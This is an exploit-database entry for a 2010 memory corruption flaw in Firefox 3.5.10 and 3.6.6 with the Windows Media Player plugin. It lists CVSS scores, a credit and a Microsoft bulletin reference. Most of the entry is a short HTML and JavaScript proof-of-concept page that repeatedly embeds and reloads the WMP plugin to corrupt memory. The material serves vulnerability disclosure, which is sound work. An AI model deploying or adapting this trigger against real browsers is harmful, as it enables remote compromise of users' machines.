Firefox 3.5.10 & 3.6.6 WMP Memory Corruption Using Popups

2010.10.15
Credit: SkyLined
Risk: High
Local: No
Remote: Yes
CWE: CWE-94


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

Source: http://code.google.com/p/skylined/issues/detail?id=21 # Exploit Title: Firefox 3.5.10 & 3.6.6 WMP Memory Corruption Using Popups # Date: 2010-10-13 # Author: berendjanwever # Version: FF 3.5.10 & 3.6.6 with WMP 10 & 11 # Tested on: Windows XP sp3 <HTML> <HEAD> <SCRIPT> function go() { var oWMP = document.getElementById("WMP"); if (oWMP) { location.reload(); } else { var oWrapper = document.getElementById("wrapper"); oWrapper.innerHTML = '<EMBED id="WMP" type="application/x-mplayer2" autostart=1 src="repro-firefox.html"></EMBED>'; setTimeout(go, 1000); } } </SCRIPT> </HEAD> <BODY onload="go()"> <SPAN id="wrapper"></SPAN> </BODY> </HTML>

References:

http://www.microsoft.com/technet/security/Bulletin/MS10-082.mspx


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top